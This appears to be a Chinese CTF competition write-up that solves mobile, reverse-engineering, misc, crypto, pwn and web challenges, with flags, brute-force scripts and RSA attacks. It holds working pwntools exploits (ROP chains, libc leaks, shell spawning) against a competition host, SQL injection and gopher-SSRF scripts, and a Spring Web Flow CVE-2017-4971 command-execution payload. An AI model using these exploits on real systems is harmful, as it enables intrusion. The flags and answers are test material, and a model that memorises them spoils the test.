Mobile
AreYouRich
JEB分析可知用户名需要10位,密码是用户名异或一个常数+@001
后续分析发现flag是根据用户名和密码生成的,在另一个类里找到提示,发现RC4加密,提取密文密钥解密。
密文:0x51,0xf3,0x54,0x92,0x48,0x4d,0xa0,0x4d,0x20,0x8d,0xb5,0xda,0x9f,0x45,0xc0,0x31,0x8e,0x53,0x87,0x2b,0xca,0xe4,0xc9,0x6d,0x0e
key:5FQ5AaBGbqLGfYwjaRAuWGdDvyjbX5nH
得到异或keyvvvvipuser_TTTTKRWQGP@001
密文0f460329013023403a32006564630b7b34083c773e73491110
异或得到flag
y0uh@V3@_107_0f_m0n3y!!
DesignEachStep
直接使用JEB动态调试,每次比对时断下可以找到key
key1:DE5_c0mp
key2:r355_m@y
key3:_c0nfu53
DE5_c0mpr355_m@y_c0nfu53
RE
petition
栈上的异或加密,IDAPython脚本提取即可。
from idaapi import *
from idc import *
def getflag(func_addr):
end_addr = ida_funcs.get_func(func_addr).end_ea
addr = func_addr + 8
key = []
while(addr<end_addr):
ins = print_insn_mnem(addr)
if(ins == 'xor' and get_operand_type(addr,1)==5 and get_operand_type(addr,0)==1):
key.append(get_operand_value(addr,1))
#print(generate_disasm_line(addr, flags=0))
addr = next_head(addr)
flag = key[0]
for i in range(1,len(key)):
flag^=key[i]
print(chr(flag&0xff),end='')
return
sub = [0x119C,0x122A,0x12B8,0x1344,0x13D0,0x145C,0x14E8,0x1574,0x1602,0x168E,0x171C,0x17A6,0x1834,0x18C2,0x194E,0x19DA,0x1A64,0x1AEE,0x1B7A,0x1C06,0x1C94,0x1D20,0x1DAA,0x1E34,0x1EC2,0x1F4E,0x1FDA,0x2064,0x20F0,0x217A,0x2208,0x2292,0x231E,0x23AC,0x243A,0x24C4,0x2552,0x25DE,0x266C,0x26FA,0x2784,0x2810]
for i in sub:
getflag(i)
Locke
ollvm混淆,使用deflat脚本可以去除大部分混淆,分析可知是一些散列和加密组成的验证,过程为
Blowfish -> ROT13 -> AES -> RC4 -> SHA1 -> Base58 -> sha256 -> md2 -> des -> md5。
都需要爆破,经过实验可知字符集为asdfghjkl
。
Blowfish
import blowfish
a = 0xD79FD778F60C9E9F
t = "asdfghjkl"
a = int.to_bytes(a,8,byteorder='little')
for e1 in range(0,len(t)):
print("yes1")
for e2 in range(0,len(t)):
for e3 in range(0,len(t)):
for e4 in range(0,len(t)):
x = b"MeowMeow"
tmp = (t[e1] + t[e2] + t[e3] + t[e4]).encode()
tmp += int.to_bytes(0x72668754,4,byteorder='little')
cipher = blowfish.Cipher(tmp)
if cipher.encrypt_block(x) == a:
print((t[e1] + t[e2] + t[e3] + t[e4]).encode())
exit(0)
# gagf
ROT13
khgs
AES
from Crypto.Cipher import AES
mode = AES.MODE_ECB
key = b"YouNeedaPassword"
l1 = [0x44, 0x32, 0x66, 0xCB, 0xAB, 0xE9, 0x2F, 0x97, 0xED, 0x34, 0x92, 0xA7, 0x3C, 0x94, 0xB0, 0xEE]
t = "asdfghjkl"
for e1 in range(0,len(t)):
print("ok")
for e2 in range(0,len(t)):
for e3 in range(0,len(t)):
for e4 in range(0,len(t)):
tmp = (t[e1] + t[e2] + t[e3] + t[e4]).encode()
a = tmp + int.to_bytes(0xF889D441683FBCEFECE468CD,12,byteorder='little') + bytes([0x29,0x2E,0x29,0x60,0xF6,0xDE,0x84,0x1A,0x50,0xE7,0x3E,0xEC,0x4D,0x5A,0x2A,0x7C])
c = AES.new(a,mode)
m = c.encrypt(key)
if b"\x44\x32\x66" in m:
print(a)
print(m)
# gdgf
-> RC4
// ConsoleApplication4.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
using namespace std;
void rc4_init(unsigned char *s, unsigned char *key, unsigned long Len)
{
int i = 0, j = 0;
char k[256] = { 0 };
unsigned char tmp = 0;
for (i = 0; i < 256; i++)
{
s[i] = i;//赋值0到256
k[i] = key[i%Len];//key循环利用
}
for (i = 0; i < 256; i++)
{
j = (j + s[i] + k[i]) % 256;//把第i个和第(s[i]+k[i]+前一个j)个交换
tmp = s[i];
s[i] = s[j]; //交换s[i]和s[j]
s[j] = tmp;
}
}//目的是用密钥生成特定的表
void rc4_crypt(unsigned char *s, unsigned char *Data, unsigned long Len)
{
int i = 0, j = 0, t = 0;
unsigned long k = 0;
unsigned char tmp;
for (k = 0; k < Len; k++)
{
i = (i + 1) % 256;//i = 0;i++
j = (j + s[i]) % 256;//j是前一个j+s[i]
tmp = s[i];
s[i] = s[j]; //交换s[i]和s[j]
s[j] = tmp;
t = (s[i] + s[j]) % 256;
Data[k] ^= s[t];//数据异或第s[i]+s[j]个
}
}
int main()
{
unsigned char s[256] = { 0 };//S-box
char key[256] = { "jkhd" };
char table[] = { "asdfghjkl" };
unsigned char cmpData[512] = "<<<<Now you need a keycard>>>>";
for (int e1 = 0; e1 < 10; e1++)
{
printf("ok\n");
for (int e2 = 0; e2 < 10; e2++)
{
for (int e3 = 0; e3 < 10; e3++)
{
for (int e4 = 0; e4 < 10; e4++)
{
unsigned char pData[512] = "<<<<Now you need a keycard>>>>";
key[0] = table[e1];
key[1] = table[e2];
key[2] = table[e3];
key[3] = table[e4];
//printf("%s\n", key);
memset(s, 0, 256);
rc4_init(s, (unsigned char*)key, 4); //已经完成了初始化
rc4_crypt(s, (unsigned char*)pData, 30);//加密
if (pData[0] = 0x3F && pData[1] == 0x9F && pData[2] == 0x30)
{
printf("====%s\n", key);
for (int i = 0; i < 10; i++)
{
printf("%x ", pData[i]);
}
}
}
}
}
}
return 0;
}
//jkhd
SHA1
./hashcat.exe -a 3 -m 100 360da9b53004607fc73322aed93ef2e2534989c9 ?a?a?a?a
#360da9b53004607fc73322aed93ef2e2534989c9:
lkfh
Base58
dslkfg
sha256 0x33
./hashcat.exe -a 3 -m 6000 3080974a55c4a477e90348ed8edb0251 ?a?a?a?a
073ea0c645230edbfccd8c87d3ee5287bcf0313b2ac86c94906b3d42231d6964:
ahgh
md2
from Crypto.Hash import MD2
txt = "3080974a55c4a477e90348ed8edb0251"
t = 'asdfghjkl'
for i in t:
for j in t:
for k in t:
for m in t:
tmp = i+j+k+m
if (MD2.new(tmp.encode("utf8")).hexdigest()==txt):
print(tmp)
#dsgf
des 最后四字节,直接程序爆破
from subprocess import Popen,PIPE
path = './Locke_recovered'
table = "asdfghjkl"
for i in table:
for j in table:
print("ok1")
for k in table:
for l in table:
p = Popen (path,stdin = PIPE,stdout = PIPE)
ans = "gagfkhgsgdgfjkhdlkfhdslkfgahghdsgf" + i + j + k + l + "dfhs"
p.stdin.write(ans.encode())##转成bytes
result = p.communicate()[0]
if b"flag" in result:
print(result)
print(ans)
md5 直接cmd5查
dfhs
最后连起来即可
MISC
new_misc
把解压的pdf扔进wbStego4open,无密码解密即可得
flag{verY_g00d_YoU_f0und_th1s}
流量分析
直接正则匹配
import re
s = r"from%20t\),([0-9]*),1\)\)=([0-9]*)"
pat = re.compile(s)
f = open("timu.pcapng","rb")
st = f.read().decode("utf-8","ignore")
lis = pat.findall(st)
aa = ['' for i in range(1000)]
for t in lis:
aa[int(t[0])] = chr(int(t[1]))
for i in aa:
print(i,end="")
#flag{w1reshARK_ez_1sntit}~~~~<
flag{w1reshARK_ez_1sntit}
A_MISC
爆破压缩包密码得到qwer
修改图片高度得到
https://pan.baidu.com/s/1cG2QvYy3khpQGLfjfbYevg
提取码cavb
同样的做法
import re
s = r"from%20t\),([0-9]*),1\)\)=([0-9]*)"
pat = re.compile(s)
f = open("timu.pcapng","rb")
st = f.read().decode("utf-8","ignore")
lis = pat.findall(st)
aa = ['' for i in range(1000)]
for t in lis:
aa[int(t[0])] = chr(int(t[1]))
for i in aa:
print(i,end="")
flag{cd2c3e2fea463ded9af800d7155be7aq}
MISC2
LSB隐写提取得到
flag{h0w_4bouT_enc0de_4nd_pnG}
直接cyberchef解码
flag{h0w_4bouT_enc0de_4nd_pnG}
MI
Crypto
a_crypto
http://www.3fwork.com/kaifa200/004475MYM012472/
easy_crypto
社会主义核心价值观解密
babyrsa
from gmpy2 import *
from Crypto.Util.number import *
p1 = 1514296530850131082973956029074258536069144071110652176122006763622293335057110441067910479
q0 = 40812438243894343296354573724131194431453023461572200856406939246297219541329623
n = 21815431662065695412834116602474344081782093119269423403335882867255834302242945742413692949886248581138784199165404321893594820375775454774521554409598568793217997859258282700084148322905405227238617443766062207618899209593375881728671746850745598576485323702483634599597393910908142659231071532803602701147251570567032402848145462183405098097523810358199597631612616833723150146418889589492395974359466777040500971885443881359700735149623177757865032984744576285054725506299888069904106805731600019058631951255795316571242969336763938805465676269140733371287244624066632153110685509892188900004952700111937292221969
mod=pow(2,265)
p0=n*invert(q0,mod)%mod
pbar=(p1<<724)+p0
PR.<x> = PolynomialRing(Zmod(n))
for i in range(32):
f=pbar+x*mod*32
f=f.monic()
pp=f.small_roots(X=2^454,beta=0.4)
if(pp):
break
pbar+=mod
p=pbar+pp[0]*32*mod
assert n%p==0
print(p)
q=n//p
phi=(p-1)*(q-1)
e=65537
d=invert(e,phi)
c=19073695285772829730103928222962723784199491145730661021332365516942301513989932980896145664842527253998170902799883262567366661277268801440634319694884564820420852947935710798269700777126717746701065483129644585829522353341718916661536894041337878440111845645200627940640539279744348235772441988748977191513786620459922039153862250137904894008551515928486867493608757307981955335488977402307933930592035163126858060189156114410872337004784951228340994743202032248681976932591575016798640429231399974090325134545852080425047146251781339862753527319093938929691759486362536986249207187765947926921267520150073408188188
m=pow(c,d,n)
print(long_to_bytes(m))
#flag{ef5e1582-8116-4f61-b458-f793dc03f2ff}
Crazy_Rsa_Tech
# -*- coding: cp936 -*-
import gmpy2
import time
def CRT(items):
N = reduce(lambda x, y: x * y, (i[1] for i in items))
result = 0
for a, n in items:
m = N / n
d, r, s = gmpy2.gcdext(n, m)
if d != 1: raise Exception("Input not pairwise co-prime")
result += a * s * m
return result % N, N
# 读入 e, n, c
e = 9
n = [71189786319102608575263218254922479901008514616376166401353025325668690465852130559783959409002115897148828732231478529655075366072137059589917001875303598680931962384468363842379833044123189276199264340224973914079447846845897807085694711541719515881377391200011269924562049643835131619086349617062034608799, 92503831027754984321994282254005318198418454777812045042619263533423066848097985191386666241913483806726751133691867010696758828674382946375162423033994046273252417389169779506788545647848951018539441971140081528915876529645525880324658212147388232683347292192795975558548712504744297104487514691170935149949, 100993952830138414466948640139083231443558390127247779484027818354177479632421980458019929149817002579508423291678953554090956334137167905685261724759487245658147039684536216616744746196651390112540237050493468689520465897258378216693418610879245129435268327315158194612110422630337395790254881602124839071919, 59138293747457431012165762343997972673625934330232909935732464725128776212729547237438509546925172847581735769773563840639187946741161318153031173864953372796950422229629824699580131369991913883136821374596762214064774480548532035315344368010507644630655604478651898097886873485265848973185431559958627423847, 66827868958054485359731420968595906328820823695638132426084478524423658597714990545142120448668257273436546456116147999073797943388584861050133103137697812149742551913704341990467090049650721713913812069904136198912314243175309387952328961054617877059134151915723594900209641163321839502908705301293546584147, 120940513339890268554625391482989102665030083707530690312336379356969219966820079510946652021721814016286307318930536030308296265425674637215009052078834615196224917417698019787514831973471113022781129000531459800329018133248426080717653298100515701379374786486337920294380753805825328119757649844054966712377, 72186594495190221129349814154999705524005203343018940547856004977368023856950836974465616291478257156860734574686154136925776069045232149725101769594505766718123155028300703627531567850035682448632166309129911061492630709698934310123778699316856399909549674138453085885820110724923723830686564968967391721281, 69105037583161467265649176715175579387938714721653281201847973223975467813529036844308693237404592381480367515044829190066606146105800243199497182114398931410844901178842049915914390117503986044951461783780327749665912369177733246873697481544777183820939967036346862056795919812693669387731294595126647751951, 76194219445824867986050004226602973283400885106636660263597964027139613163638212828932901192009131346530898961165310615466747046710743013409318156266326090650584190382130795884514074647833949281109675170830565650006906028402714868781834693473191228256626654011772428115359653448111208831188721505467497494581]
c = [62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515]
print '[+]Detecting m...'
data = zip(c, n)
x, n = CRT(data)
realnum = gmpy2.iroot(gmpy2.mpz(x), e)[0].digits()
print ' [-]m is: ' + '{:x}'.format(int(realnum)).decode('hex')
print '[!]All Done!'
PWN
littleof
from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
#r = process("./littleof")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
r = remote("182.116.62.85",27056)
libc = ELF("./libc-2.27.so")
payload = "a" * 8 * 9
r.sendlineafter("Do you know how to do buffer overflow?\n",payload)
r.recvuntil(payload + "\n")
canary = u64(r.recv(7).rjust(8,"\x00"))
stack = u64(r.recv(6).ljust(8,"\x00"))
success("canary : " + hex(canary))
success("stack : " + hex(stack))
payload = "a" * 8 * 9
payload += p64(canary)
payload += p64(stack)
payload += p64(0x4007f1)
payload += p64(0x400800)
payload += p64(0x400860)
payload += p64(0)
payload += p64(0)
payload += p64(0x400789)
r.sendlineafter("harder!",payload)
payload = "a" * 8
r.sendlineafter("Do you know how to do buffer overflow?\n",payload)
r.recvuntil(payload)
libc_base = u64(r.recv(6).ljust(8,"\x00")) - 0xa - libc.sym["_IO_2_1_stdin_"]
success("libc_base : " + hex(libc_base))
p_rdi_r = libc_base + 0x00000000000215bf
p_rsi_r = libc_base + 0x0000000000023eea
p_rdx_r = libc_base + 0x0000000000001b96
sh_addr = libc_base + libc.search('/bin/sh').next()
system_addr = libc_base + libc.sym["execve"]
payload = "a" * 8 * 9
payload += p64(canary)
payload += "b" * 8
payload += p64(p_rdi_r)
payload += p64(sh_addr)
payload += p64(p_rsi_r)
payload += p64(0)
payload += p64(p_rdx_r)
payload += p64(0)
payload += p64(system_addr)
r.sendlineafter("harder!",payload)
r.interactive()
babyof
from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
def ret2csu(offset,csu_end_addr,csu_front_addr,rdx,rsi,edi,call_target,last_ret,rbx = 0,rbp = 1):
'''
rdx = r15
rsi = r14
edi = r13d
call [r12 + rbx * 8]
rbx + 1 == rbp
'''
payload = ""
payload += "a" * offset
payload += "b" * 0x8
payload += p64(csu_end_addr) # ret_addr
payload += p64(rbx) # rbx
payload += p64(rbp) # rbp
payload += p64(call_target) # r12
payload += p64(edi) # r13
payload += p64(rsi) # r14
payload += p64(rdx) # r15
payload += p64(csu_front_addr)
payload += p64(0) * 7
payload += p64(last_ret)
return payload
#r = process("./babyof")
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
elf = ELF("./babyof")
r = remote("182.116.62.85",21613)
libc = ELF("./libc-2.27.so")
r.recvuntil("Do you know how to do buffer overflow?")
# puts(puts_got)
edi = elf.got["puts"]
rsi = 0
rdx = 0
call_target = elf.got["puts"]
main_addr = 0x40066B
payload = ret2csu(0x40,0x40073A,0x400720,rdx,rsi,edi,call_target,main_addr)
r.sendline(payload)
r.recvuntil("I hope you win\n")
libc_base = u64(r.recvuntil("\n",drop = True).ljust(8,"\x00")) - libc.sym["puts"]
success("libc_base : " + hex(libc_base))
# read(0,bss_base,0x10)
bss_base = 0x601100
edi = 0
rsi = bss_base
rdx = 0x10
call_target = elf.got["read"]
main_addr = 0x40066B
payload = ret2csu(0x40,0x40073A,0x400720,rdx,rsi,edi,call_target,main_addr)
r.send(payload)
sleep(0.5)
execve_addr = libc_base + libc.sym["execve"]
payload = ""
payload += p64(execve_addr)
payload += "/bin/sh\x00"
r.send(payload)
# execve("/bin/sh")
edi = bss_base + 8
rsi = 0
rdx = 0
call_target = bss_base
main_addr = 0x40066B
payload = ret2csu(0x40,0x40073A,0x400720,rdx,rsi,edi,call_target,main_addr)
r.send(payload)
r.interactive()
onecho
from pwn import *
context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']
def dbg(cmd = ""):
gdb.attach(r,cmd)
#r = process("./onecho")
#libc = ELF("/usr/lib/i386-linux-gnu/libc-2.31.so")
elf = ELF("./onecho")
r = remote("182.116.62.85",24143)
libc = ELF("./libc.so.6")
main_addr = 0x8049220
puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
bss_addr = 0x0804C100
p_ebx_r = 0x08049022
p_edi_ebp_r = 0x08049812
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_ebx_r)
payload += p32(bss_addr)
payload += p32(puts_plt)
payload += p32(0x804973F)
payload += p32(puts_got)
r.sendlineafter("Input your name:\n",payload)
libc_base = u32(r.recv(4)) - libc.sym["puts"]
success(f"libc_base : {hex(libc_base)}")
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
# dbg("b *0x804966D")
# open("./flag")
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_edi_ebp_r)
payload += p32(bss_addr)
payload += p32(1)
payload += p32(open_addr)
payload += p32(0x804973F)
payload += p32(bss_addr)
r.sendlineafter("Input your name:\n",payload)
# read(3,bss+0x200,0x40)
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_edi_ebp_r)
payload += p32(bss_addr)
payload += p32(1)
payload += p32(read_addr)
payload += p32(0x804973F)
payload += p32(3)
payload += p32(bss_addr+0x200)
payload += p32(0x40)
r.sendlineafter("Input your name:\n",payload)
# write(1,bss+0x200,0x40)
payload = b"./flag\x00"
payload += b"a" * (0x10c-7)
payload += b"b" * 4
payload += p32(p_edi_ebp_r)
payload += p32(bss_addr)
payload += p32(1)
payload += p32(write_addr)
payload += p32(0x804973F)
payload += p32(1)
payload += p32(bss_addr+0x200)
payload += p32(0x40)
r.sendlineafter("Input your name:\n",payload)
r.interactive()
pwn1
#coding:utf-8
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
debug = 0
if debug == 1:
r = process('./pwn')
# gdb.attach(r)
else:
r = remote('182.116.62.85',24199)
def add(name, price, descrip_size, description):
r.recvuntil('your choice>> ')
r.send('1\n')
r.recvuntil('name:')
r.send(name + '\n')
r.recvuntil('price:')
r.send(str(price) + '\n')
r.recvuntil('descrip_size:')
r.send(str(descrip_size) + '\n')
r.recvuntil('description:')
r.send(str(description) + '\n')
def dele(name):
r.recvuntil('your choice>> ')
r.send('2\n')
r.recvuntil('name:')
r.send(name + '\n')
def lis():
r.recvuntil('your choice>> ')
r.send('3\n')
r.recvuntil('all commodities info list below:\n')
return r.recvuntil('\n---------menu---------')[:-len('\n---------menu---------')]
def changePrice(name, price):
r.recvuntil('your choice>> ')
r.send('4\n')
r.recvuntil('name:')
r.send(name + '\n')
r.recvuntil('input the value you want to cut or rise in:')
r.send(str(price) + '\n')
def changeDes(name, descrip_size, description):
r.recvuntil('your choice>> ')
r.send('5\n')
r.recvuntil('name:')
r.send(name + '\n')
r.recvuntil('descrip_size:')
r.send(str(descrip_size) + '\n')
r.recvuntil('description:')
r.send(description + '\n')
def exit():
r.recvuntil('your choice>> ')
r.send('6\n')
add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')
changeDes('2', 0x100, 'a')
add('4', 10, 4, 'a')
def leak_one(address):
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(address))
res = lis().split('des.')[-1]
if(res == '\n'):
return '\x00'
return res[0]
def leak(address):
content = leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3)
log.info('%#x => %#x'%(address, u32(content)))
return content
#d = DynELF(leak, elf = ELF('./pwn'))
malloc_addr = u32(leak(0x804b028))
log.info("malloc_addr = " + hex(malloc_addr))
obj = LibcSearcher("malloc",malloc_addr)
libcbase = malloc_addr - obj.dump("malloc")
system_addr = libcbase + obj.dump("system")
log.info('system \'s address = %#x'%(system_addr))
bin_addr = 0x0804B0B8
changeDes('1', 0x8, '/bin/sh\x00')
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))
changeDes('4', 8, p32(system_addr))
dele('1')
r.interactive()
easyecho
from pwn import *
context.log_level = 'debug'
p = process("./easyecho")
p.recvuntil("Name: ")
p.send('a'*0x10)
p.recvuntil('a'*0x10)
leak = u64(p.recvn(6)+b'\x00\x00')
log.info("leak = " + hex(leak))
codebase = leak + 0x555555400000 - 0x555555400cf0
flag = codebase + 0x000000000202040
p.recvuntil("Input: ")
p.sendline("backdoor\x00")
p.recvuntil("Input: ")
#gdb.attach(p)
p.sendline(p64(flag)*0x50)
p.recvuntil("Input: ")
p.sendline("exitexit\x00")
p.interactive()
WEB
middle_magic
绕过正则:
/?aaa=%0apass_the_level_1%23
sha1用数组绕过,还有一个弱比较,用true绕过
最后payload
POST:
admin[]=1&root_pwd[]=2&level_3={"result":true}
easy_sql_2
version:8.0.26-0ubuntu0.20.04.2
import requests
url = 'http://182.116.62.85:26571/login.php'
res = 'flag{spMG94bd95z7h07ZZhCFXQutxY'
for i in range(32):
for x in range(33,127):
if chr(x) not in '\'\\"#$^%':
"""
data = {
"username":'''admin'/**/and/**/(('ctf','{}',3,4,5,6)<(table/**/mysql.innodb_table_stats/**/limit/**/0,1))#'''.format(res+chr(x)),
"password":"123"
}
"""
data = {
"username":'''admin'/**/and/**/(binary('{}')<(table/**/fl11aag/**/limit/**/1,1))#'''.format(res+chr(x)),
"password":"123"
}
#print(data)
r = requests.post(url,data=data)
#print(r.text)
if "username error!" in r.text:
res += chr(x-1)
print(res)
break
easy_sql_1
use.php有个curl
可以用gopher协议访问到index.php
用admin:admin登录成功后,出现cookie,是base64后的username
在cookie处存在注入,可以通过报错拿到flag
import requests
import urllib.parse
import base64
url = 'http://182.116.62.85:28303/use.php'
sqlpayload = 'uname=admin&passwd=admin&Submit=1'
cookie = b'''this_is_your_cookie=admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#'''
sqlbody1 = '''POST /index.php HTTP/1.1
Host: 127.0.0.1
Content-type:application/x-www-form-urlencoded
Content-Length: {}
{}
'''.replace('\n','\r\n').format(len(sqlpayload),sqlpayload)
sqlbody = '''GET /index.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=3qip5l91lc1jtal09u9h40tkp0;this_is_your_cookie={}
'''.replace('\n','\r\n').format(urllib.parse.quote(str(base64.b64encode(cookie),encoding='utf-8')))
print(sqlbody)
gopher_payload = urllib.parse.quote('gopher://127.0.0.1:80/_'+ urllib.parse.quote(sqlbody))
r = requests.get(url+'?url='+gopher_payload)
print(r.text)
easyP
第一个正则匹配结尾部分,后面加字符绕过,结合basename无法处理非ascii字符,在后面添加%ff
basename就会获取到utils.php
第二个正则url编码绕过
/index.php/utils.php/%ff?show%5fsource=1
Spring
CVE-2017-4971
Spring Web Flow 远程代码执行漏洞复现
Confirm处添加恶意数据即可实现命令执行
如:
&_(new+java.lang.ProcessBuilder("/bin/bash","/tmp/shell.sh")).start()=feifei
发表评论
您还未登录,请先登录。
登录